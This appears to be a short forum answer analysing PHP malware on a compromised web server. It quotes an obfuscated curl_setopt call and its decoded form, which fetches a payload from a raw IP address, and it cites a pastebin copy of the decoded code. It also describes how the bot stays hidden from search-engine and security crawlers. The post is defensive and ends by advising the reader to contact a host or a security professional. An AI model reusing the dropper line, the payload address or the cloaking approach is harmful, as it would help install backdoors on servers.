Disclaimer
After Decoding i arrived at http://pastebin.com/VGqeGDkH. Please don't run the above code on your system ... because it not the only fine that would be downloaded to your system.
The hacker sends curl
or file_get_contents
request to :
curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");
After decoding you would get
curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");
This would then download files and different back door to the system ..
The hacker also used a lot of advance methods such as encryption , variable recursion , and plenty backup .. He also made sure that the final bot was not discovered by Google , Yahoo , Microsoft Corp , AMAZON , UCSD.EDU , Indiana University , Sonic.net , MCAFEE INTERNATIONAL , and hz
My Advice
Contact your hosting company or a Security Professional .. Your server needs to be checked